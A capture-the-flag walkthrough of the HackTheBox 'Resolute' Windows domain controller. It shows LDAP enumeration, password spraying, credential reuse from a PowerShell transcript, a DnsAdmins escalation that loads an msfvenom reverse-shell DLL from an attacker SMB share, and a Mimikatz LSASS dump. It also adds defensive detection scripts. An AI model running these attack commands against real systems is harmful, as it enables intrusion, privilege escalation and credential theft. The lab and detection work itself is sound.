HTB Resolute Card

Resolute is a medium-rated HackTheBox machine. It involved finding, through anonymous LDAP queries, the default password used for new corporate accounts; password spraying to find a user who had not changed that default; finding a PowerShell transcript file with plaintext credentials for another user; and EoP by taking advantage of that user's DnsAdmins group membership to reconfigure the DNS service so that it loaded a malicious DLL as soon as it started.

Reconnaissance

Port Scan

Let’s start with an nmap port scan of all TCP ports with service/version detection and default scripts.

nmap -sV -sC -vvv 10.10.10.169
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-23 12:34:02Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC

LDAP Enumeration

Since anonymous bind is allowed, we can retrieve a list of corporate usernames with the following LDAP query and some bash fu.

ldapsearch -LLL -x -h 10.10.10.169 -b 'dc=megabank,dc=local' '(objectClass=user)' \
| grep sAMAccountName | tail -n +5 | cut -d' ' -f2 | tee users.txt

ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
[...]

Then, with the following LDAP query, we can also ask the DC to return the description field for all users. User marko’s description contained a note with what appeared to be the default password set for new corporate accounts.

ldapsearch -LLL -x -h 10.10.10.169 -b 'dc=megabank,dc=local' \
'(objectClass=user)' userPrincipalName sAMAccountName description

...[snip]...

dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko
userPrincipalName: [email protected]

...[snip]...

Credentials found:

  • Username: marko
  • Password: Welcome123!

Unfortunately, the user had probably changed the password: attempting to connect to the box via SMB or WinRM with these credentials returns an authentication error.
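The description attribute is a classic place for help-desk notes like the one above to leak initial passwords, and it is readable by every authenticated (here even anonymous) principal. The following script, added as an example and not part of the original writeup, parses ldapsearch LDIF output (including folded continuation lines and base64-encoded `::` values) and flags any description that mentions a password-like keyword, masking the candidate secret so the finding can be logged safely. SAMPLE_LDIF is a constructed sample: the marko entry is the one shown on the page, the other two entries are made up to exercise the parser.

```python
"""Audit ldapsearch LDIF output for 'description' attributes that look like
they carry credentials (the weakness shown above).

Added example, not part of the original writeup.  SAMPLE_LDIF is a
constructed sample modelled on the ldapsearch output on the page: the
marko entry is the one shown there, the other two are made up to
exercise LDIF line folding and base64-encoded ('::') values.
"""
import base64
import re

SAMPLE_LDIF = """\
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko
userPrincipalName: marko@megabank.local

dn: CN=Contractor 01,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
sAMAccountName: contractor01
description: Contractor account - see ticket for det
 ails

dn: CN=svc_backup,OU=Service Accounts,DC=megabank,DC=local
sAMAccountName: svc_backup
description:: VGVtcCBwd2Q6IFN1bW1lcjIwMjAh
"""

# Words that usually precede a secret in free-text fields.
SECRET_WORD = r"\b(?:password|passwd|pass|pwd|credentials?|creds|secret|pin)\b"
SECRET_HINT = re.compile(SECRET_WORD, re.I)
# Group 1: keyword plus optional filler ("set to", "is", "=");
# group 2: the token that follows it, i.e. the probable secret.
SECRET_VALUE = re.compile(
    "(" + SECRET_WORD + r"\W*(?:set\s+to\W*|is\W*|=\W*)?)(\S+)", re.I)


def unfold_ldif(text):
    """LDIF folds long values onto following lines that start with one
    space; join them back before parsing."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def parse_ldif(text):
    """Return a list of entries, each a dict attribute (lower-case) -> [values].
    Handles 'attr:: base64' values and skips comment lines."""
    entries, current = [], {}
    for line in unfold_ldif(text):
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.lower(), []).append(value)
    if current:
        entries.append(current)
    return entries


def redact(description):
    """Mask the token following a secret keyword so findings can be logged."""
    return SECRET_VALUE.sub(r"\1*****", description)


def find_description_secrets(ldif_text):
    """Return [(sAMAccountName, redacted description)] for every entry
    whose description mentions a secret keyword."""
    hits = []
    for entry in parse_ldif(ldif_text):
        for desc in entry.get("description", []):
            if SECRET_HINT.search(desc):
                name = entry.get("samaccountname", ["?"])[0]
                hits.append((name, redact(desc)))
    return hits


if __name__ == "__main__":
    for name, desc in find_description_secrets(SAMPLE_LDIF):
        print(f"{name}: {desc}")
```

In practice the input would be the output of the same ldapsearch query shown above, run with a low-privileged account, and every hit is a description to clear and a password to rotate.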

SMB Password Spraying

We can assume Welcome123! is the default password assigned to every new user in the megabank.local domain, so we use crackmapexec to spray that password against the user list and discover any account that still hasn’t changed the default.

crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'

...[snip]...
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [+] MEGABANK\melanie:Welcome123!

User melanie is still using the default password. We can use these credentials to log into the box via WinRM.
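From the domain controller's side the spray above looks like a burst of 4625 (failed logon) events for many different accounts from a single source, followed by one 4624 success. The script below is an added example, not part of the original writeup: it slides a time window over per-source failures, alerts when enough distinct accounts failed, and reports any success from the same source in that window as the likely compromised account. SAMPLE_EVENTS is a constructed set of records modelled on the crackmapexec output above (0xC000006D is STATUS_LOGON_FAILURE); the threshold and window are assumptions to tune per environment.

```python
"""Detect a password spray in Windows Security log data: one source IP
failing to log on as many different accounts in a short window, with any
success from the same source in that window flagged as the likely
compromised account.

Added example, not part of the original writeup.  SAMPLE_EVENTS is a
constructed set of 4625 (failed logon) / 4624 (logon) records modelled
on the crackmapexec run above; 0xC000006D is STATUS_LOGON_FAILURE.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    {"time": "2020-04-23T12:40:01", "id": 4625, "user": "annika",  "ip": "10.10.15.138", "status": "0xC000006D"},
    {"time": "2020-04-23T12:40:01", "id": 4625, "user": "per",     "ip": "10.10.15.138", "status": "0xC000006D"},
    {"time": "2020-04-23T12:40:02", "id": 4625, "user": "claude",  "ip": "10.10.15.138", "status": "0xC000006D"},
    {"time": "2020-04-23T12:40:02", "id": 4624, "user": "melanie", "ip": "10.10.15.138", "status": "0x0"},
    {"time": "2020-04-23T12:40:03", "id": 4625, "user": "sunita",  "ip": "10.10.15.138", "status": "0xC000006D"},
    {"time": "2020-04-23T12:40:03", "id": 4625, "user": "fred",    "ip": "10.10.15.138", "status": "0xC000006D"},
    # One user mistyping their own password twice is not a spray.
    {"time": "2020-04-23T12:41:00", "id": 4625, "user": "angela",  "ip": "10.10.14.7",   "status": "0xC000006D"},
    {"time": "2020-04-23T12:41:05", "id": 4625, "user": "angela",  "ip": "10.10.14.7",   "status": "0xC000006D"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return one alert per source IP that failed to log on as at least
    `min_users` distinct accounts within `window`."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e))

    alerts = []
    for ip, items in by_ip.items():
        items.sort(key=lambda pair: pair[0])
        failures = [(t, e) for t, e in items if e["id"] == 4625]
        for start, _ in failures:          # slide the window over each failure
            end = start + window
            tried = {e["user"] for t, e in failures if start <= t < end}
            if len(tried) < min_users:
                continue
            succeeded = {e["user"] for t, e in items
                         if e["id"] == 4624 and start <= t < end}
            alerts.append({
                "ip": ip,
                "window_start": start.isoformat(),
                "attempted": sorted(tried),
                "succeeded": sorted(succeeded),
            })
            break                           # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in detect_password_spray(SAMPLE_EVENTS):
        print(f"spray from {a['ip']} at {a['window_start']}: "
              f"{len(a['attempted'])} accounts tried, succeeded: {a['succeeded']}")
```

Keying on distinct target accounts per source, rather than on failures per account, is what separates a spray from a brute force against one user and keeps it under the lockout threshold an attacker is deliberately staying below.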

Initial Access

./evil-winrm.rb -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'

...[snip]...

*Evil-WinRM* PS C:\Users\melanie\Documents>

As user melanie we can read the user flag.

*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3be45fcfe249796cc[...]

In C:\ there’s a non-default hidden directory called PSTranscripts.

*Evil-WinRM* PS C:\> gci -Force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        4/21/2020   6:56 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts

...[snip]...

Inside the PSTranscripts folder there is another hidden folder, which contains a .txt file.

*Evil-WinRM* PS C:\PSTranscripts\20191203> gci -Force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The file is a PowerShell transcript, and it contains the credentials of user ryan, who passed his plaintext password on the command line of a net use command.

...[snip]...

**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

...[snip]...

Log in as ryan using Evil-WinRM.

./evil-winrm.rb -i 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

*Evil-WinRM* PS C:\Users\ryan\Documents>

User ryan is a member of the DnsAdmins group.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups | findstr Admin

MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-...

Privilege Escalation to SYSTEM

Since user ryan is a member of the DnsAdmins group, we can escalate our privileges by reconfiguring and restarting the DNS service, which runs as NT AUTHORITY\SYSTEM. By registering a custom DLL containing meterpreter shellcode as part of the new configuration, we get a shell as NT AUTHORITY\SYSTEM as soon as the service is restarted.

First, we generate a meterpreter reverse-shell DLL for 64-bit Windows using msfvenom, and host it with impacket’s smbserver.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.138 LPORT=7001 -f dll > evil.dll
smbserver.py -smb2support SHARED ~/HTB/Resolute/www/evil.dll

Then we use the dnscmd utility to register the DLL as a server-level plugin for the DNS service.

dnscmd.exe /config /serverlevelplugindll \\10.10.15.138\SHARED\evil.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Finally, after starting a netcat listener to catch the reverse shell connection, we restart the DNS service.

sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3500
        FLAGS

As expected, we got a shell as NT AUTHORITY\SYSTEM.

nc -lnvp 7001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::7001
Ncat: Listening on 0.0.0.0:7001
Ncat: Connection from 10.10.10.169.
Ncat: Connection from 10.10.10.169:59914.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
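The whole escalation above leaves one very specific footprint: a write to the ServerLevelPluginDll value under the DNS service's Parameters key, here pointing at a UNC path, followed by a stop/start of the DNS service. The script below is an added example, not part of the original writeup, that parses Sysmon RegistryEvent records (Event ID 13, value set) and rates every change to that value, with a UNC path as critical. It assumes a Sysmon configuration that actually records the HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters key; the XML is a constructed, trimmed-down sample modelled on the change made above, not real telemetry from the box.

```python
"""Flag changes to the DNS server's ServerLevelPluginDll registry value in
Sysmon data: this is the value dnscmd /config /serverlevelplugindll
writes, and the DNS service loads whatever DLL it points at on start.

Added example, not part of the original writeup.  It assumes a Sysmon
configuration that records RegistryEvent (Event ID 13, value set) for the
HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters key.  The XML
below is a constructed, trimmed-down sample modelled on the change made
above; it is not real telemetry from the box.
"""
import xml.etree.ElementTree as ET

SAMPLE_SYSMON_XML = r"""<Events>
<Event>
  <System><EventID>13</EventID><Computer>Resolute.megabank.local</Computer></System>
  <EventData>
    <Data Name="EventType">SetValue</Data>
    <Data Name="UtcTime">2020-04-23 12:55:10.123</Data>
    <Data Name="Image">C:\Windows\System32\dns.exe</Data>
    <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll</Data>
    <Data Name="Details">\\10.10.15.138\SHARED\evil.dll</Data>
  </EventData>
</Event>
<Event>
  <System><EventID>13</EventID><Computer>Resolute.megabank.local</Computer></System>
  <EventData>
    <Data Name="EventType">SetValue</Data>
    <Data Name="UtcTime">2020-04-23 12:56:00.000</Data>
    <Data Name="Image">C:\Windows\System32\svchost.exe</Data>
    <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname</Data>
    <Data Name="Details">RESOLUTE</Data>
  </EventData>
</Event>
<Event>
  <System><EventID>13</EventID><Computer>Resolute.megabank.local</Computer></System>
  <EventData>
    <Data Name="EventType">SetValue</Data>
    <Data Name="UtcTime">2020-04-23 13:02:45.500</Data>
    <Data Name="Image">C:\Windows\System32\dns.exe</Data>
    <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll</Data>
    <Data Name="Details">C:\Windows\System32\contoso_dnsplugin.dll</Data>
  </EventData>
</Event>
<Event>
  <System><EventID>12</EventID><Computer>Resolute.megabank.local</Computer></System>
  <EventData>
    <Data Name="EventType">CreateKey</Data>
    <Data Name="UtcTime">2020-04-23 13:03:00.000</Data>
    <Data Name="Image">C:\Windows\System32\dns.exe</Data>
    <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters</Data>
  </EventData>
</Event>
</Events>"""

# Case-insensitive suffix of the registry value that names the plugin DLL.
DNS_PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"


def parse_sysmon(xml_text):
    """Flatten each <Event> into a dict: EventID plus every EventData field."""
    events = []
    for ev in ET.fromstring(xml_text).findall("Event"):
        rec = {"EventID": int(ev.findtext("System/EventID"))}
        for data in ev.findall("EventData/Data"):
            rec[data.get("Name")] = (data.text or "").strip()
        events.append(rec)
    return events


def detect_dns_plugin_dll(events):
    """One alert per value-set on ServerLevelPluginDll.  A UNC path (DLL
    pulled from a remote share, as on this box) is rated critical, any other
    non-empty path high, and clearing the value info."""
    alerts = []
    for e in events:
        if e.get("EventID") != 13:
            continue
        if not e.get("TargetObject", "").lower().endswith(DNS_PLUGIN_VALUE):
            continue
        dll = e.get("Details", "")
        if dll == "":
            severity = "info"
        elif dll.startswith("\\\\"):
            severity = "critical"
        else:
            severity = "high"
        alerts.append({"time": e.get("UtcTime"), "severity": severity,
                       "image": e.get("Image"), "dll": dll})
    return alerts


if __name__ == "__main__":
    for a in detect_dns_plugin_dll(parse_sysmon(SAMPLE_SYSMON_XML)):
        print(f"[{a['severity']}] {a['time']} {a['image']} -> {a['dll']}")
```

Because the value is written by the DNS server process on behalf of the RPC caller, the registry event alone does not name the DnsAdmins member who issued dnscmd; correlate it with the System log entries for the DNS Server service stopping and starting, and with the dnscmd process creation on the host it was run from.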

Root flag

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d94876a506850d0c20e[...]

Bonus - Dumping LSASS

Finally, with an administrative (SYSTEM) shell, we can run Mimikatz from the SMB share and dump LSASS process memory, which contained the Administrator’s logon credentials (the NTLM hash shown below).

C:\Users\Administrator\Music>\\10.10.15.138\SHARED\mimikatz.exe
\\10.10.15.138\SHARED\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 346648 (00000000:00054a18)
Session           : Interactive from 1
User Name         : Administrator
Domain            : MEGABANK
Logon Server      : RESOLUTE
Logon Time        : 4/21/2020 4:32:22 AM
SID               : S-1-5-21-1392959593-3013219662-3596683436-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : MEGABANK
         * NTLM     : fb3b106896cdaa8a08072775fbd9afe9
         * SHA1     : 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
         * DPAPI    : b0ea673ad8371cc2873a75a4124365cf

...[snip]...